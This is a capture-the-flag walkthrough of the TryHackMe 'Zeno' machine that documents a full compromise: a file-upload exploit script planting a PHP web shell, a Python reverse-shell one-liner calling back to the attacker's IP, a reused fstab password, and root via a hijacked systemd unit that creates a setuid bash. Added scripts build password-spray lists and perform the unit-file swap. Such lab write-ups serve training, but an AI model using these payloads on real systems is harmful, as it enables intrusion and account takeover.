Zeno

You can find this machine here : https://tryhackme.com/room/zeno

Port Scan

┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn zeno.thm -p-

PORT      STATE SERVICE
22/tcp    open  ssh
12340/tcp open  unknown

Directory Scan

┌──(kali㉿Zeus)-[~]
└─$ gobuster dir -u http://zeno.thm:12340/  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowerca
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://zeno.thm:12340/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt,bak
[+] Timeout:                 10s
===============================================================
2022/02/25 20:00:44 Starting gobuster in directory enumeration mode
===============================================================
/rms                  (Status: 301) [Size: 239] [--> http://10.10.190.102:12340/rms/]


Restaurant Management System 1.0 - Remote Code Execution

┌──(kali㉿Zeus)-[~/Desktop]
└─$ searchsploit Restaurant Management System
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
Restaurant Management System 1.0 - Remote Code Execution                         | php/webapps/47520.py
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                   
┌──(kali㉿Zeus)-[~/Desktop]
└─$ locate php/webapps/47520.py
/usr/share/exploitdb/exploits/php/webapps/47520.py
                                                                                                                   
┌──(kali㉿Zeus)-[~/Desktop]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/47520.py .
  • Modified Script (the Referer and Cookie headers were pointed at the Zeno host; the upload endpoint, form field and shell path are the ones from the ExploitDB script)

import requests
import sys

# Usage: python3 47520.py http://zeno.thm:12340/rms/
# The trailing slash matters: "admin/foods-exec.php" and "images/" are appended as-is.
if len(sys.argv) < 2 or len(sys.argv[1]) < 8:
    print("[+] Usage : python rms-rce.py http://localhost:80/")
    exit()

url = sys.argv[1]

print("[+] Restaurant Management System Exploit, Uploading Shell")

# admin/foods-exec.php saves the "photo" field under images/ without checking
# the session or the file extension, so a .php upload lands on disk as-is.
target = url + "admin/foods-exec.php"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    # requests recomputes Content-Length from the body; this value is ignored.
    "Content-Length": "327",
    # The body below uses "--" + this boundary as its part delimiter.
    "Content-Type": "multipart/form-data;boundary=---------------------------191691572411478",
    "Connection": "close",
    "Referer": "http://zeno.thm:12340/rms/admin/foods.php",
    # Session id shipped with the original exploit; the endpoint does not validate it.
    "Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
    "Upgrade-Insecure-Requests": "1"
}

# Hand-built multipart body: one file part carrying the PHP web shell, plus the
# Submit button the foods.php form sends. Everything before the first
# delimiter is multipart preamble and is ignored by the parser.
data = """

-----------------------------191691572411478
Content-Disposition: form-data; name="photo"; filename="reverse-shell.php"
Content-Type: text/html

<?php echo shell_exec($_GET["cmd"]); ?>
-----------------------------191691572411478
Content-Disposition: form-data; name="Submit"

Add
-----------------------------191691572411478--
"""

r = requests.post(target, verify=False, headers=headers, data=data)

# The app keeps the original filename, so the shell is reachable under images/.
print("[+] Shell Uploaded. Please check the URL :" + url + "images/reverse-shell.php")

Upload The Backdoor

┌──(kali㉿Zeus)-[~/Desktop]
└─$ python3 47520.py http://zeno.thm:12340/rms/
[+] Restaurant Management System Exploit, Uploading Shell
[+] Shell Uploaded. Please check the URL :http://zeno.thm:12340/rms/images/reverse-shell.php

Reverse Shell

  • Browser
http://zeno.thm:12340/rms/images/reverse-shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.18.45.56%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27
  • Listener
┌──(kali㉿Zeus)-[~]
└─$ nc -lnvp 4444             
listening on [any] 4444 ...
connect to [10.18.45.56] from (UNKNOWN) [10.10.190.102] 51022
sh-4.2$


LinPeas


  • Found Possible Credentials


/etc/fstab:#//10.10.10.10/secret-share        /mnt/secret-share       cifs    _netdev,vers=3.0,ro,username=zeno,password=Frobj<REMOVED>anJa,domain=localdomain,soft 0 0

The mount is commented out, but the CIFS password is still sitting in clear text in /etc/fstab, which is world-readable. The entry names the user zeno; the password is reused by the local user edward.

  • Edward Credentials
edward : Frobj<REMOVED>anJa
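Added here as an example rather than something from the writeup: a small parser that pulls credential-bearing mount options out of an fstab (commented-out entries included, since that is exactly the Zeno case) and turns each password into a list of (user, password) pairs to try against every local login-shell account, because a password found this way often belongs to a different account than the one the mount names. The sample fstab and passwd contents are constructed; SECRET_OPTIONS and the function names are this example's own.

```python
# Constructed sample /etc/fstab: the commented-out CIFS mount LinPEAS flagged on
# Zeno (password redacted as in the writeup) plus ordinary entries.
SAMPLE_FSTAB = """\
UUID=4e2b-example / xfs defaults 0 0
#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=Frobj<REMOVED>anJa,domain=localdomain,soft 0 0
//10.10.10.11/public /mnt/public cifs credentials=/root/.smbcreds,vers=3.0 0 0
tmpfs /tmp tmpfs defaults 0 0
"""

# Constructed sample /etc/passwd for the password-reuse check.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
edward:x:1000:1000::/home/edward:/bin/bash
"""

# Mount options that carry authentication material (cifs.mount / mount.nfs style).
SECRET_OPTIONS = {"username", "user", "password", "pass", "credentials", "domain"}


def find_fstab_credentials(text):
    """Return one dict per fstab entry that embeds credentials, commented out or not."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        commented = line.startswith("#")
        fields = line.lstrip("#").split()  # fs_spec fs_file fs_vfstype fs_mntops [dump pass]
        if len(fields) < 4:
            continue
        source, mountpoint, fstype, options = fields[:4]
        secrets = {}
        for opt in options.split(","):
            key, _, value = opt.partition("=")
            if key in SECRET_OPTIONS and value:
                secrets[key] = value
        if secrets:
            findings.append({
                "line": lineno,
                "commented": commented,
                "source": source,
                "mount": mountpoint,
                "fstype": fstype,
                **secrets,
            })
    return findings


def interactive_users(passwd_text):
    """Accounts whose login shell is not nologin/false."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false")):
            users.append(fields[0])
    return users


def spray_candidates(findings, passwd_text):
    """(user, password) pairs to try: the user named in the mount first, then every
    local login-shell account, since the password may belong to one of them instead."""
    candidates = []
    for finding in findings:
        password = finding.get("password") or finding.get("pass")
        if not password:
            continue  # credentials= points at a file; nothing to spray from this entry
        users = [finding.get("username") or finding.get("user")] + interactive_users(passwd_text)
        for user in users:
            if user and (user, password) not in candidates:
                candidates.append((user, password))
    return candidates


if __name__ == "__main__":
    for finding in find_fstab_credentials(SAMPLE_FSTAB):
        print(finding)
    print(spray_candidates(find_fstab_credentials(SAMPLE_FSTAB), SAMPLE_PASSWD))
```

On a real host, feed it the contents of /etc/fstab and /etc/passwd; a credentials= entry is reported too, because the referenced file is worth checking for read access even though it yields no password directly.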

User Owned

Using that password to get a shell as edward gives the user flag.

Root PrivEsc - Writable Service

[edward@zeno ~]$ sudo -l

User edward may run the following commands on zeno:
    (ALL) NOPASSWD: /usr/sbin/reboot
[edward@zeno ~]$ 
  • Run LinPeas as edward: the monitoring unit is writable
/etc/systemd/system/multi-user.target.wants/zeno-monitoring.service
/etc/systemd/system/zeno-monitoring.service

The unit runs as root (User=root) and edward can write to it, so whatever ExecStart points at is executed as root the next time the service starts. edward cannot restart the service with systemctl, but the sudo rule lets him reboot the box, which does.

  • Old zeno-monitoring.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/root/zeno-monitoring.py

[Install]
WantedBy=multi-user.target

  • New zeno-monitoring.service using vi
  1. vi zeno-monitoring.service
  2. Move to the ExecStart line with the arrow keys
  3. Press i for INSERT
  4. Replace /root/zeno-monitoring.py with /bin/bash -c "cp /bin/bash /home/edward/bash; chmod +s /home/edward/bash"
  5. Press ESC
  6. Type :x! to write the file and quit
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "cp /bin/bash /home/edward/bash; chmod +s /home/edward/bash"

[Install]
WantedBy=multi-user.target
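The check LinPEAS did here can be reproduced in a few lines. Added as an example (not code from the writeup or from LinPEAS), the script below parses a unit file, reports when a root-run unit or its ExecStart target is group- or world-writable, and performs the same ExecStart swap the vi session above did, without touching the rest of the file. The unit text is copied from above and written to a temporary file with a chosen mode so the check runs offline; audit_unit, replace_exec_start and the other names are this example's own.

```python
import os
import stat
import tempfile
from configparser import ConfigParser

# Copy of the unit file shown above, used as constructed input below.
ZENO_MONITORING_UNIT = """\
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/root/zeno-monitoring.py

[Install]
WantedBy=multi-user.target
"""

# The replacement ExecStart pasted in with vi above.
PAYLOAD = '/bin/bash -c "cp /bin/bash /home/edward/bash; chmod +s /home/edward/bash"'


def parse_unit(text):
    """Unit files are INI-like, but keys are case-sensitive and may repeat."""
    cp = ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def exec_start_binary(exec_start):
    """First word of ExecStart= with systemd's prefix characters (- @ + ! :) removed."""
    if not exec_start.strip():
        return ""
    return exec_start.split()[0].lstrip("-@+!:")


def others_can_write(path):
    """Group- or world-writable mode bits on the file itself."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_unit(path):
    """Return (user, binary, findings) for one unit file."""
    with open(path) as fh:
        cp = parse_unit(fh.read())
    service = cp["Service"] if cp.has_section("Service") else {}
    user = service.get("User", "root")  # systemd runs the service as root when User= is absent
    binary = exec_start_binary(service.get("ExecStart", ""))
    findings = []
    if user == "root" and others_can_write(path):
        findings.append(f"{path}: unit runs as root and is writable; ExecStart can be hijacked")
    if binary and os.path.exists(binary) and others_can_write(binary):
        findings.append(f"{binary}: ExecStart target is writable")
    return user, binary, findings


def replace_exec_start(text, new_command):
    """The vi edit, done line-wise so the rest of the unit stays untouched."""
    lines = []
    for line in text.splitlines():
        if line.startswith("ExecStart="):
            line = "ExecStart=" + new_command
        lines.append(line)
    return "\n".join(lines) + "\n"


def audit_sample(mode):
    """Write the sample unit to a temp file with the given mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "zeno-monitoring.service")
        with open(path, "w") as fh:
            fh.write(ZENO_MONITORING_UNIT)
        os.chmod(path, mode)
        return audit_unit(path)


if __name__ == "__main__":
    print(audit_sample(0o666))
    print(replace_exec_start(ZENO_MONITORING_UNIT, PAYLOAD))
```

A mode-bit check is only half of it: a unit owned by the low-privileged user is just as exploitable with 0644, so a real sweep also compares the file's owner and group against the account being tested.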

Root Owned

Resource : https://book.hacktricks.xyz/linux-unix/privilege-escalation#cron-path

[edward@zeno system]$ sudo -u root /usr/sbin/reboot

The reboot is what triggers the payload: systemd starts the modified unit as root at boot, so the copy of bash in /home/edward comes up owned by root with the setuid bit set. Once the box is back, it has to be started with -p (/home/edward/bash -p); without that flag bash drops the elevated effective UID and the shell is plain edward again.